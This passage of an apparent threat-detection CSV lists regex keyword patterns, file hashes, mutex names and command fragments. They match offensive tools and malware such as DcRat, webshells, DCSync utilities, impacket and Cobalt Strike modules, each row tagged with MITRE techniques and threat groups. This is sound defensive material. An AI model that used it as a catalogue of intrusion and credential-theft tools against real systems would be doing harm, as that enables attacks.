Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","#filehash","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","40354" "*dce55c6179bb6f63cbdc3da71c057970fae70cdd66a3fdbe5caedbe8f130e2a2*",".{0,1000}dce55c6179bb6f63cbdc3da71c057970fae70cdd66a3fdbe5caedbe8f130e2a2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40356" "*dce6f896d4a7b3eeee722bc55b1ea573daa03f81d55714bbfd6c2ebb5a67bf3b*",".{0,1000}dce6f896d4a7b3eeee722bc55b1ea573daa03f81d55714bbfd6c2ebb5a67bf3b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40357" "*dcef9a8f6aefcf3bbd1facfea19407604e12bec996f162e7bb2d7e0ae0d6e5db*",".{0,1000}dcef9a8f6aefcf3bbd1facfea19407604e12bec996f162e7bb2d7e0ae0d6e5db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40358" "*dcenum.run*",".{0,1000}dcenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40359" "*dcf01d7641ec3fec213ab8335625a3554b943ac8*",".{0,1000}dcf01d7641ec3fec213ab8335625a3554b943ac8.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","40360" 
"*dcf08ed817f5705040d3e83a602e475d8290a10280fbf631a1962aa5e5bb6417*",".{0,1000}dcf08ed817f5705040d3e83a602e475d8290a10280fbf631a1962aa5e5bb6417.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40361" "*dcf25634e64e3b63715dd4fb669648a819e99b860697aec8fc5da5f5565bad91*",".{0,1000}dcf25634e64e3b63715dd4fb669648a819e99b860697aec8fc5da5f5565bad91.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40362" "*dcff5e7b030398229d694241415d632ccba115af4846926d16284475d4845236*",".{0,1000}dcff5e7b030398229d694241415d632ccba115af4846926d16284475d4845236.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","40363" "*--dc-ip *--check-user-access*",".{0,1000}\-\-dc\-ip\s.{0,1000}\-\-check\-user\-access.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in 
vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","N/A","5","N/A","N/A","N/A","N/A","40364" "*dcipher-cli*",".{0,1000}dcipher\-cli.{0,1000}","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","N/A","3","233","27","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z","40365" "*dcomexec -*",".{0,1000}dcomexec\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","40366" "*dcomexec.py*",".{0,1000}dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40367" "*dcomhijack.cna*",".{0,1000}dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40368" "*dcomhijack.py -object *",".{0,1000}dcomhijack\.py\s\-object\s.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40369" "*dcomhijack.py*",".{0,1000}dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40370" 
"*dcomhijack-main*",".{0,1000}dcomhijack\-main.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40371" "*DCOMPotato.*",".{0,1000}DCOMPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","40372" "*DCOMPotato-master*",".{0,1000}DCOMPotato\-master.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","40373" "*DCOMReflection.cpp*",".{0,1000}DCOMReflection\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","40374" "*DCOMUploadExec.exe *",".{0,1000}DCOMUploadExec\.exe\s.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40375" "*DCOMUploadExec-main.zip*",".{0,1000}DCOMUploadExec\-main\.zip.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40376" "*DcRat 1.0.7*",".{0,1000}DcRat\s\s1\.0\.7.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40377" "*DcRat By qwqdanchun*",".{0,1000}DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40378" "*DCRat Keylogger*",".{0,1000}DCRat\sKeylogger.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in 
C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40379" "*DcRat.7z*",".{0,1000}DcRat\.7z.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40380" "*DcRat.exe*",".{0,1000}DcRat\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40381" "*DcRat.zip*",".{0,1000}DcRat\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40382" "*DcRat_png.png*",".{0,1000}DcRat_png\.png.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40383" "*DCRatBuild*",".{0,1000}DCRatBuild.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40384" "*DCRat-Log#*",".{0,1000}DCRat\-Log\#.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40385" "*DcRat-main.zip*",".{0,1000}DcRat\-main\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40386" "*DcRatMutex_qwqdanchun*",".{0,1000}DcRatMutex_qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#mutex","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40387" "*DCRatPlugin*",".{0,1000}DCRatPlugin.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40388" "*dcrypt_bartpe.zip*",".{0,1000}dcrypt_bartpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40389" "*dcrypt_install.iss*",".{0,1000}dcrypt_install\.iss.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40390" 
"*dcrypt_setup_*.exe*",".{0,1000}dcrypt_setup_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40391" "*dcrypt_winpe.zip*",".{0,1000}dcrypt_winpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40392" "*dcsync -Domain*",".{0,1000}dcsync\s\-Domain.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","40393" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","40394" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","40395" 
"*dcsync@protonmail.com*",".{0,1000}dcsync\@protonmail\.com.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","#email","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","40396" "*dcsync_inject*",".{0,1000}dcsync_inject.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - 
T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40397" "*dcsyncattack(*",".{0,1000}dcsyncattack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40398" "*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40399" 
"*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40400" "*dcsyncclient.*",".{0,1000}dcsyncclient\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","40401" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
